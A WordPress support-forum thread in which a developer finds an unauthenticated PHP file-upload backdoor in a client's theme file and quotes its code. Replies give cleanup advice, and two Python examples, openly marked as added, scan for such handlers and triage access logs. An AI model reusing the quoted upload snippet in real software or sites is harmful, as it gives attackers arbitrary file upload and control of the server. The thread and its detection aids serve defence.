Title: Website possibly hacked?
Last modified: August 22, 2016

---

# Website possibly hacked?

 *  [dpanych](https://wordpress.org/support/users/dpanych/)
 * (@dpanych)
 * [11 years, 8 months ago](https://wordpress.org/support/topic/website-possibly-hacked/)
 * I am updating the styling for a client’s website and it seems to have gotten 
   hacked. When I visit their website they have a File Upload widget in the header
   and when I would navigate to /wp-admin I get the following error:
 * > Warning: Cannot modify header information – headers already sent by (output
   > started at /home/***/public_html/wp-content/themes/theme47225/includes/class-tgm-plugin-activation.php:17)
   > in /home/…
 * Here is the content inside the class-tgm-plugin-activation.php file:
 *     ```
       <?php
       if(isset($_POST['Submit'])){
           $filedir = "";
           $maxfile = '2000000';
   
           $userfile_name = $_FILES['image']['name'];
           $userfile_tmp = $_FILES['image']['tmp_name'];
           if (isset($_FILES['image']['name'])) {
               $abod = $filedir.$userfile_name;
               @move_uploaded_file($userfile_tmp, $abod);
   
       echo"<center><b>Done ==> $userfile_name</b></center>";
       }
       }
       else{
       echo'
       <form method="POST" action="" enctype="multipart/form-data"><input type="file" name="image"><input type="Submit" name="Submit" value="Submit"></form>';
       }
       ?>
       ```
   
 * So I removed the following:
 *     ```
       echo'
       <form method="POST" action="" enctype="multipart/form-data"><input type="file" name="image"><input type="Submit" name="Submit" value="Submit"></form>';
       ```
   
 * and it seemed to be all fixed. The next day I went to the website and the same
   thing happened.
 * Anyone know how to recover from this?
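The file quoted in the post writes `$_FILES` input straight to disk with no login, nonce or file-type check. As an added example (not part of the original post or of any WordPress tool), this Python sketch flags PHP files with those traits; the sample sources, the `gallery-upload.php` name and the temporary directory layout are constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# Traits of the quoted file, plus WordPress checks a legitimate handler makes.
UPLOAD_CALL = re.compile(r"(@?)\s*move_uploaded_file\s*\(", re.I)
FILES_INPUT = re.compile(r"\$_FILES\s*\[")
WP_CHECKS = re.compile(r"\b(wp_handle_upload|wp_check_filetype|wp_verify_nonce"
                       r"|check_admin_referer|current_user_can)\s*\(")

# Constructed samples: the quoted pattern and a hypothetical checked handler.
SAMPLE_BARE = """<?php
@move_uploaded_file($_FILES['image']['tmp_name'], $_FILES['image']['name']);
"""
SAMPLE_CHECKED = """<?php
if (current_user_can('upload_files') && wp_verify_nonce($_POST['n'], 'up')) {
    move_uploaded_file($_FILES['image']['tmp_name'], $target);
}
"""

def score_php(source):
    """Return the reasons a PHP source looks like a bare upload handler."""
    call = UPLOAD_CALL.search(source)
    if not call or not FILES_INPUT.search(source):
        return []
    reasons = ["move_uploaded_file() fed from $_FILES"]
    if call.group(1):
        reasons.append("errors suppressed with @")
    if not WP_CHECKS.search(source):
        reasons.append("no nonce, capability or file-type check")
    return reasons

def scan_tree(root):
    """Map relative path -> reasons for each flagged *.php file under root."""
    hits = {}
    for path in sorted(Path(root).rglob("*.php")):
        reasons = score_php(path.read_text(encoding="utf-8", errors="replace"))
        if reasons:
            hits[path.relative_to(root).as_posix()] = reasons
    return hits

def demo():
    """Write both samples into a throwaway tree and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        inc = Path(tmp, "themes/theme47225/includes")
        inc.mkdir(parents=True)
        (inc / "class-tgm-plugin-activation.php").write_text(SAMPLE_BARE)
        (inc / "gallery-upload.php").write_text(SAMPLE_CHECKED)
        return scan_tree(tmp)
```

Hits are leads for manual review, not verdicts: these literal patterns will not match an obfuscated backdoor, so compare flagged files against a clean copy of the theme.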

Viewing 4 replies - 1 through 4 (of 4 total)

 *  Moderator [t-p](https://wordpress.org/support/users/t-p/)
 * (@t-p)
 * [11 years, 8 months ago](https://wordpress.org/support/topic/website-possibly-hacked/#post-5232465)
 * – Try reviewing this Codex page to solve the headers already sent problem: [http://codex.wordpress.org/FAQ_Troubleshooting#How_do_I_solve_the_Headers_already_sent_warning_problem.3F](http://codex.wordpress.org/FAQ_Troubleshooting#How_do_I_solve_the_Headers_already_sent_warning_problem.3F)
 *  [The Hack Repair Guy](https://wordpress.org/support/users/tvcnet/)
 * (@tvcnet)
 * [11 years, 8 months ago](https://wordpress.org/support/topic/website-possibly-hacked/#post-5232522)
 * Someone most definitely added that upload snippet to your page.
 * If I were in your situation, I would go back and find the original theme files,
   remove the existing theme and replace from my virgin backup.
 * Changing all related passwords would not hurt either.
 *  [perezbox](https://wordpress.org/support/users/perezbox/)
 * (@perezbox)
 * [11 years, 8 months ago](https://wordpress.org/support/topic/website-possibly-hacked/#post-5232652)
 * Hi [@dpanych](https://wordpress.org/support/users/dpanych/)
 * Replacing your theme will likely do little for you in this case. Often in cases
   of reinfections the attacker has a means of regaining access to your environment.
 * Whether it be via a Backdoor, or via your own WP-Admin controls.
 * This is what I would do:
 * 1 – I would investigate when the changes are happening. You can do this by analyzing
   your logs to see what events are occurring. Look for log entries that trigger
   wp-login and / or the editor – you should be able to see this.
 * 2 – I would purge all accounts of their passwords just in case, there are a few
   different tools to help with this. One such would be the Sucuri plugin: [http://wordpress.org/plugins/sucuri-scanner/](http://wordpress.org/plugins/sucuri-scanner/)
   There is actually a section in there for post-hacks. It will not only purge the
   passwords but also reset your salts / keys – an important step many forget to
   do.
 * 3 – Once all your controls are set, including FTP, you enter the most difficult
   section which is trying to identify if a backdoor exists. This, I won’t lie, 
   won’t be easy but a good place to start is here: [http://codex.wordpress.org/FAQ_My_site_was_hacked](http://codex.wordpress.org/FAQ_My_site_was_hacked)
 * Once you get the reinfection to stop for at least 48 hours you can feel a little
   more comfortable in the actions you’ve taken.
 * One very simple step is to replace WordPress core files – that is wp-admin / 
   wp-includes and the root files. You should see which those are.
 * Happy hunting.
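Step 1 of the reply above (finding when the changes happen from wp-login and editor log entries) can be scripted. This is an added example, not part of the reply or of the Sucuri plugin; it assumes an Apache/nginx combined-format access log, assumes that WordPress answers an accepted login with a 302 redirect, and runs on constructed log lines.

```python
import re
from collections import defaultdict

# Assumes Apache/nginx "combined" access-log format.
LINE = re.compile(r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                  r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) ')

# (label, path pattern, required status or None). Rules apply to POST only.
RULES = [
    ("login-ok", re.compile(r"^/wp-login\.php"), "302"),  # redirect = accepted
    ("editor-post", re.compile(r"^/wp-admin/(theme|plugin)-editor\.php"), None),
    ("php-post-in-wp-content", re.compile(r"^/wp-content/.+\.php(\?|$)"), None),
]

# Constructed log lines (documentation IP ranges, invented timestamps).
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Mar/2014:02:14:09 +0000] "POST /wp-login.php HTTP/1.1" 200 3120 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [12/Mar/2014:02:14:11 +0000] "POST /wp-login.php HTTP/1.1" 302 - "-" "Mozilla/5.0"',
    '203.0.113.7 - - [12/Mar/2014:02:15:40 +0000] "POST /wp-admin/theme-editor.php HTTP/1.1" 302 - "-" "Mozilla/5.0"',
    '198.51.100.23 - - [12/Mar/2014:09:01:02 +0000] "GET /wp-content/themes/theme47225/style.css HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [13/Mar/2014:01:02:03 +0000] "POST /wp-content/themes/theme47225/includes/class-tgm-plugin-activation.php HTTP/1.1" 200 64 "-" "Mozilla/5.0"',
]

def classify(line):
    """Return (ip, timestamp, label, path) for a flagged request, else None."""
    m = LINE.match(line)
    if not m or m["method"] != "POST":
        return None
    for label, path_re, status in RULES:
        if path_re.search(m["path"]) and status in (None, m["status"]):
            return m["ip"], m["ts"], label, m["path"]
    return None

def triage(lines):
    """Group flagged requests per client IP, in log order."""
    timeline = defaultdict(list)
    for hit in filter(None, map(classify, lines)):
        timeline[hit[0]].append(hit[1:])
    return dict(timeline)

if __name__ == "__main__":
    for ip, events in triage(SAMPLE_LOG).items():
        for ts, label, path in events:
            print(ip, ts, label, path)
```

An accepted login followed by an editor POST points at stolen or weak credentials, while POSTs to a PHP file under wp-content with no preceding login point at a backdoor that survives password resets.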
 *  [dpauley1980](https://wordpress.org/support/users/dpauley1980/)
 * (@dpauley1980)
 * [11 years, 2 months ago](https://wordpress.org/support/topic/website-possibly-hacked/#post-5232735)
 * I suffered the same hack. When I deleted the same line as him, my page went whiteout.
   I cannot get back to that page. Can I not fix this now?

The topic ‘Website possibly hacked?’ is closed to new replies.

## Tags

 * [hacked](https://wordpress.org/support/topic-tag/hacked/)
 * [header](https://wordpress.org/support/topic-tag/header/)

 * In: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/)
 * 4 replies
 * 5 participants
 * Last reply from: [dpauley1980](https://wordpress.org/support/users/dpauley1980/)
 * Last activity: [11 years, 2 months ago](https://wordpress.org/support/topic/website-possibly-hacked/#post-5232735)
 * Status: not resolved

